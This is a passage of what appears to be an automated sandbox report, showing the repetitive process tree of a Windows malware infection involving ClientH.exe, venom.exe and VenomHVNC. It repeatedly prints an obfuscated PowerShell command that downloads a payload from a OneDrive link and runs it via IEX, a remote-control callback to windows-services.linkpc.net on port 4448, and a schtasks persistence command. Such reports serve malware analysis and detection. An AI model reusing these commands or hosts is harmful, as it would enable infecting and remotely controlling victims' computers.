        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        14⤵
        
        PID:4740
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        15⤵
        
        PID:1252
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        16⤵
        
        PID:2212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7124
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        12⤵
        
        PID:2600
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        13⤵
        
        PID:5196
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        13⤵
        
        PID:5204
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        12⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        12⤵
        
        PID:5512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3956
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        14⤵
        
        PID:4736
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        15⤵
        
        PID:6072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7456
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        11⤵
        
        PID:2220
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        12⤵
        
        PID:4336
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        12⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        11⤵
        
        PID:4992
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        11⤵
        
        PID:3716
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        12⤵
        
        PID:5500
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        13⤵
        
        PID:7428
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        14⤵
        
        PID:5760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7944
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        10⤵
        
        PID:4320
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        11⤵
        
        PID:3552
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        11⤵
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        10⤵
        
        PID:2036
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        10⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3112
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        12⤵
        
        PID:7432
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        13⤵
        
        PID:6732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6460
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        9⤵
        
        PID:984
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        10⤵
        
        PID:3524
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        10⤵
        
        PID:452
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        9⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        9⤵
        
        PID:3948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1248
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        11⤵
        
        PID:7408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        12⤵
        
        PID:7364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3848
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        8⤵
        
        PID:3712
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        9⤵
        
        PID:4960
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        9⤵
        
        PID:4352
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        9⤵
        
        PID:4380
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        8⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        8⤵
        
        PID:4056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2480
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        10⤵
        
        PID:7120
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        11⤵
        
        PID:7576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        7⤵
        
        PID:1448
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        8⤵
        
        PID:1896
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        8⤵
        
        PID:3172
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        7⤵
        
        PID:244
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit
        8⤵
        
        PID:6344
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6828
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5213.tmp.bat""
        8⤵
        
        PID:6752
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        9⤵
        Delays execution with timeout.exe
        
        PID:5552
        
        C:\Users\Admin\AppData\Roaming\System.exe
        
        "C:\Users\Admin\AppData\Roaming\System.exe"
        9⤵
        
        PID:1916
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        7⤵
        
        PID:3956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3016
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        9⤵
        
        PID:3548
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        10⤵
        
        PID:7196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6008
      - C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        6⤵
        
        PID:1452
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        7⤵
        
        PID:8
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        7⤵
        
        PID:3552
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        7⤵
        
        PID:1372
      - C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        6⤵
        
        PID:3708
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        6⤵
        
        PID:3492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:496
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        8⤵
        
        PID:5340
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        9⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7980
    - - C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        5⤵
        
        PID:1232
      - C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        6⤵
        
        PID:3112
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        6⤵
        
        PID:1720
    - - C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        5⤵
        
        PID:2240
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        5⤵
        
        PID:1048
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3296
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        7⤵
        
        PID:5268
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        8⤵
        
        PID:556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7400
  - - C:\Users\Admin\AppData\Local\Temp\ClientH.exe
      "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
      4⤵
      PID:4352
    - - C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        5⤵
        
        PID:1916
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        5⤵
        
        PID:1196
  - - C:\Users\Admin\AppData\Local\Temp\venom.exe
      "C:\Users\Admin\AppData\Local\Temp\venom.exe"
      4⤵
      PID:4388
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
      4⤵
      PID:3476
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3924
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        6⤵
        
        PID:5888
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        7⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1008
- - C:\Users\Admin\AppData\Local\Temp\ClientH.exe
    "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
    3⤵
    - Modifies WinLogon for persistence
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3132
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:3604
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
      4⤵
      PID:4040
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
      4⤵
      PID:4972
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
      4⤵
      PID:4560
- - C:\Users\Admin\AppData\Local\Temp\venom.exe
    "C:\Users\Admin\AppData\Local\Temp\venom.exe"
    3⤵
    - Executes dropped EXE
    PID:492
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3204
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4312
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        5⤵
        
        PID:4328
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        6⤵
        
        PID:6712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3708
- C:\Users\Admin\AppData\Local\Temp\ClientH.exe
  "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    3⤵
    PID:2560
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
    3⤵
    PID:332
- C:\Users\Admin\AppData\Local\Temp\venom.exe
  "C:\Users\Admin\AppData\Local\Temp\venom.exe"
  2⤵
  - Executes dropped EXE
  PID:4980
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit
    3⤵
    PID:4952
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCC1A.tmp.bat""
    3⤵
    PID:4016
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:1748
  - - C:\Users\Admin\AppData\Roaming\System.exe
      "C:\Users\Admin\AppData\Roaming\System.exe"
      4⤵
      PID:5600
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1060
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
    3⤵
    PID:2952
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
      4⤵
      PID:5796
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        5⤵
        
        PID:5456
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
